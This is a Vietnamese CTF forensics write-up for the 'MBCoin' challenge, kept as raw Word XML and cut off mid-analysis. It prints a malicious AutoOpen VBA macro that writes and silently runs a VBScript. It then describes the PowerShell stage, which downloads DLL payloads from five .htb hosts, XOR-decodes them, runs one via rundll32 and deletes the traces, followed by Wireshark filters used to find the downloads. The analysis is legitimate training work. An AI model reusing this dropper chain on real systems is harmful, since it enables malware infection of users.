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4635" w14:textId="4ED42A84" w:rsidR="00326F60" w:rsidRDefault="000B1166">
      <w:r>
        <w:t>Challenge MBC</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:t>oin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BBEBD" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r>
        <w:t>Challenge cung cấp 2 file đầu vào:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75215DA8" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166"/>
    <w:p w14:paraId="1C12DFC2" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r>
        <w:t>- `mbcoin.doc`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1ED458" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r>
        <w:t>- `</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mbcoin.pcapng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C4F6A9" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166"/>
    <w:p w14:paraId="5CB309B1" w14:textId="0F5069FE" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r>
        <w:t>kiểm tra file `.doc` trước để xem tài liệu có chứa macro hay không</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60D7598F" wp14:editId="676BC839">
            <wp:extent cx="5943600" cy="3046730"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="10297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8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521E" w14:textId="0708B386" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r>
        <w:t>deobfuscate để dễ nhìn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C63D71" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r w:rsidRPr="000B1166">
        <w:t>Sub AutoOpen()</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Dim QQ1 As Object</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Set QQ1 = ActiveDocument.Shapes(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Dim QQ2 As Object</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Set QQ2 = ActiveDocument.Shapes(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    RO = "C:\ProgramData\"</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    ROI = RO + "pin.vbs"</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    ii = ""</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Ne = "IZIMIZIOZI"</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t xml:space="preserve">    WW = QQ1.AlternativeText + QQ2.AlternativeText</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    MyFile = FreeFile</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Open ROI For Output As #MyFile</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Print #MyFile, WW</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Close #MyFile</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    fun = Shell("cmd /k cscript.exe C:\ProgramData\pin.vbs", 0)</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    waitTill = Now() + TimeValue("00:00:05")</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    While Now() &lt; waitTill</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    Wend</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    MsgBox ("Unfortunately you are not eligable for free coin!")</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t xml:space="preserve">    End</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE22DFF" w14:textId="2EAE97B3" w:rsidR="000B1166" w:rsidRPr="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r>
        <w:t xml:space="preserve">Nhận xét </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A2A86B" w14:textId="77777777" w:rsidR="000B1166" w:rsidRPr="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r w:rsidRPr="000B1166">
        <w:t>Các chuỗi quan trọng bị đảo bằng `StrReverse`:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t>- `\ataDmargorP\:C` → `C:\ProgramData\`</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t>- `sbv.nip` → `pin.vbs`</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t>Macro lấy nội dung từ `AlternativeText` của 2 shape, ghép lại rồi ghi ra:</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t>```text</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1166">
        <w:br/>
        <w:t>C:\ProgramData\pin.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23E312" w14:textId="77777777" w:rsidR="000B1166" w:rsidRPr="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r w:rsidRPr="000B1166">
        <w:t>Sau đó chạy file này bằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACAE6FA" w14:textId="77777777" w:rsidR="000B1166" w:rsidRPr="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r w:rsidRPr="000B1166">
        <w:t>cmd /k cscript.exe C:\ProgramData\pin.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550C02EC" w14:textId="77777777" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000B1166">
        <w:t>Chr(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000B1166">
        <w:t>48) = "0", tương ứng chạy cửa sổ ẩn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E35B80" w14:textId="77777777" w:rsidR="00731448" w:rsidRDefault="00731448" w:rsidP="000B1166"/>
    <w:p w14:paraId="18BCA318" w14:textId="77777777" w:rsidR="00731448" w:rsidRPr="00731448" w:rsidRDefault="00731448" w:rsidP="00731448">
      <w:r w:rsidRPr="00731448">
        <w:t>Vậy giờ đã biết được nội dung còn được giấu trong `AlternativeText` của các `Shape`, vì macro có đoạn:</w:t>
      </w:r>
      <w:r w:rsidRPr="00731448">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00731448">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00731448">
        <w:lastRenderedPageBreak/>
        <w:t>```vb</w:t>
      </w:r>
      <w:r w:rsidRPr="00731448">
        <w:br/>
        <w:t>WW = QQ1.AlternativeText + QQ2.AlternativeText</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B3EBF" w14:textId="3EB0605A" w:rsidR="000B1166" w:rsidRDefault="000B1166" w:rsidP="000B1166">
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00731448">
        <w:t>sử</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dụng</w:t>
      </w:r>
      <w:r w:rsidR="00731448">
        <w:t xml:space="preserve"> strings </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00731448">
        <w:t xml:space="preserve">và </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> grep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> để rep chuỗi ww </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4D665E" w14:textId="3020C0F9" w:rsidR="00731448" w:rsidRDefault="00731448" w:rsidP="000B1166">
      <w:r w:rsidRPr="00731448">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7397E2CD" wp14:editId="3B63EADE">
            <wp:extent cx="5943600" cy="2515870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10691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0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34A" w14:textId="7C000861" w:rsidR="00731448" w:rsidRDefault="00731448" w:rsidP="000B1166">
      <w:r>
        <w:t xml:space="preserve">Thấy được đoạn powershell đang bị obfuscate, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A165ABA" w14:textId="53584EAE" w:rsidR="0000031F" w:rsidRDefault="0000031F" w:rsidP="000B1166">
      <w:r>
        <w:t xml:space="preserve">Sau khi deobfuscate nhận thấy </w:t>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:t>Nhóm LL1 → LL5: tải payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> từ 5 nguồn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6280"/>
        <w:gridCol w:w="2562"/>
      </w:tblGrid>
      <w:tr w:rsidR="0000031F" w:rsidRPr="0000031F" w14:paraId="71C00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5EAEE" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0000031F">
              <w:rPr>
                <w:b/>
                <w:bCs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66B28540" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0000031F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9AECB74" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0000031F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>File ghi ra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000031F" w:rsidRPr="0000031F" w14:paraId="03CE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A043" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>LL1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1771278C" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>http://priyacareers.htb/u9hDQN9Yy7g/pt.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B06ED6A" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>C:\ProgramData\www1.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000031F" w:rsidRPr="0000031F" w14:paraId="5A68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8A3F" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>LL2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E6605C" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>https://perfectdemos.htb/Gv1iNAuMKZ/jv.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="750BA294" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>C:\ProgramData\www2.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000031F" w:rsidRPr="0000031F" w14:paraId="1EEC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F9C8" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>LL3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54C718AA" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>http://bussiness-z.htb/ze8pCNTIkrIS/wp.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="750A15A2" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>C:\ProgramData\www3.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000031F" w:rsidRPr="0000031F" w14:paraId="38B22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0A5B" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>LL4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D7BF8C2" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>http://cablingpoint.htb/ByH5NDoE3kQA/vm.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4803110E" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>C:\ProgramData\www4.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000031F" w:rsidRPr="0000031F" w14:paraId="462B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872F" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>LL5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637CD816" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>https://bonus.corporatebusinessmachines.htb/1Y0qVNce/tz.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="477A9ECE" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
            <w:r w:rsidRPr="0000031F">
              <w:t>C:\ProgramData\www5.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="690822C8" w14:textId="77777777" w:rsidR="0000031F" w:rsidRDefault="0000031F" w:rsidP="000B1166"/>
    <w:p w14:paraId="418BD0CA" w14:textId="77777777" w:rsidR="0000031F" w:rsidRDefault="0000031F" w:rsidP="000B1166">
      <w:r w:rsidRPr="0000031F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16C61BF2" wp14:editId="46709BC1">
            <wp:extent cx="5943600" cy="2306955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20541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2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C77B" w14:textId="69140EE2" w:rsidR="0000031F" w:rsidRDefault="0000031F" w:rsidP="000B1166">
      <w:r w:rsidRPr="0000031F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6083BFC3" wp14:editId="4A772C66">
            <wp:extent cx="5943600" cy="3934460"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="9143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0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D696" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000031F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nhóm MM1 → MM5: XOR payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2158E" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
      <w:r w:rsidRPr="0000031F">
        <w:t>Mỗi MMx làm cùng một việc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF1B2FD" w14:textId="77777777" w:rsidR="0000031F" w:rsidRPr="0000031F" w:rsidRDefault="0000031F" w:rsidP="0000031F">
      <w:r w:rsidRPr="0000031F">
        <w:t>$b = ReadAllBytes("C:\ProgramData\wwwx.dll")</w:t>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:br/>
        <w:t>$k = "key tương ứng"</w:t>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:br/>
        <w:t>$r = byte array mới</w:t>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:br/>
        <w:t>for từng byte:</w:t>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    r[i] = b[i] XOR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0000031F">
        <w:t>k[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0000031F">
        <w:t>i % len(k)]</w:t>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0000031F">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0000031F">
        <w:t>WriteAllBytes(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0000031F">
        <w:t>"C:\ProgramData\www.dll", r)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE6E3F1" w14:textId="0A2E5DD0" w:rsidR="0000031F" w:rsidRDefault="002A1847" w:rsidP="000B1166">
      <w:r w:rsidRPr="002A1847">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD1ADBC" wp14:editId="5903BB27">
            <wp:extent cx="5943600" cy="3311525"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="10338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3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AE28" w14:textId="77777777" w:rsidR="002A1847" w:rsidRPr="002A1847" w:rsidRDefault="002A1847" w:rsidP="002A1847">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A1847">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nhóm OK1, OK2: chạy và dọn file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F33EA" w14:textId="77777777" w:rsidR="002A1847" w:rsidRPr="002A1847" w:rsidRDefault="002A1847" w:rsidP="002A1847">
      <w:r w:rsidRPr="002A1847">
        <w:t xml:space="preserve">OK1 = "cmd /c rundll32.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A1847">
        <w:t>C:\ProgramData\www.dll,ldr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A1847">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002A1847">
        <w:br/>
        <w:t>OK2 = "cmd /c del C:\programdata\www*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E133B0" w14:textId="77777777" w:rsidR="002A1847" w:rsidRPr="002A1847" w:rsidRDefault="002A1847" w:rsidP="002A1847">
      <w:r w:rsidRPr="002A1847">
        <w:t xml:space="preserve">rundll32.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A1847">
        <w:t>C:\ProgramData\www.dll,ldr</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4A88B10B" w14:textId="77777777" w:rsidR="002A1847" w:rsidRPr="002A1847" w:rsidRDefault="002A1847" w:rsidP="002A1847">
      <w:r w:rsidRPr="002A1847">
        <w:t>=&gt; chạy DLL www.dll, gọi export tên ldr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FCBF1F" w14:textId="77777777" w:rsidR="002A1847" w:rsidRPr="002A1847" w:rsidRDefault="002A1847" w:rsidP="002A1847">
      <w:r w:rsidRPr="002A1847">
        <w:t>Sau đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133CF715" w14:textId="77777777" w:rsidR="002A1847" w:rsidRPr="002A1847" w:rsidRDefault="002A1847" w:rsidP="002A1847">
      <w:r w:rsidRPr="002A1847">
        <w:t>del C:\programdata\www*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DFACFC" w14:textId="77777777" w:rsidR="002A1847" w:rsidRDefault="002A1847" w:rsidP="002A1847">
      <w:r w:rsidRPr="002A1847">
        <w:t>=&gt; xóa các file www1.dll, www2.dll, ..., www.dll để dọn dấu vết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244A7D13" w14:textId="4FC694CE" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>Giờ quay lại `pcap`, vì đã biết nhóm `LL1` đến `LL5` tải payload từ các URL trong script, nên sử dụng filter để lọc những HTTP request có URI trùng với các file được tải:</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>```wireshark</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>http.request and (</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t xml:space="preserve">    http.request.uri contains "pt.html" or</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t xml:space="preserve">    http.request.uri contains "jv.html" or</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    http.request.uri contains "wp.html" or</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t xml:space="preserve">    http.request.uri contains "vm.html" or</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t xml:space="preserve">    http.request.uri contains "tz.html"</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD0A35" w14:textId="77777777" w:rsidR="00652035" w:rsidRPr="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>Các file này tương ứng với:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D77F6" w14:textId="77777777" w:rsidR="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>pt.html -&gt; www1.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>jv.html -&gt; www2.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>wp.html -&gt; www3.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>vm.html -&gt; www4.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>tz.html -&gt; www5.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E929374" w14:textId="20A3BA50" w:rsidR="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
        <w:t>Sau khi dùng filter chỉ thấy có 3 request tải payload qua HTTP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F02B31D" wp14:editId="2EBBAA66">
            <wp:extent cx="5943600" cy="617855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40395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0E5" w14:textId="245D48DE" w:rsidR="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r>
        <w:t xml:space="preserve">Tương ứng với 3 file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F81398" w14:textId="676505CA" w:rsidR="00652035" w:rsidRDefault="00652035" w:rsidP="002A1847">
      <w:r w:rsidRPr="00652035">
        <w:t>GET /u9hDQN9Yy7g/pt.html -&gt; www1.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>GET /ze8pCNTIkrIS/wp.html -&gt; www3.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00652035">
        <w:br/>
        <w:t>GET /ByH5NDoE3kQA/vm.html -&gt; www4.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC5E791" w14:textId="7D0AEB32" w:rsidR="00652035" w:rsidRDefault="00652035" w:rsidP="002A1847">
      <w:r>
        <w:t xml:space="preserve">Vậy giờ export 3 file này ra để phân tích tiếp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FF535" w14:textId="77777777" w:rsidR="00652035" w:rsidRDefault="00652035" w:rsidP="00652035">
      <w:r w:rsidRPr="00652035">
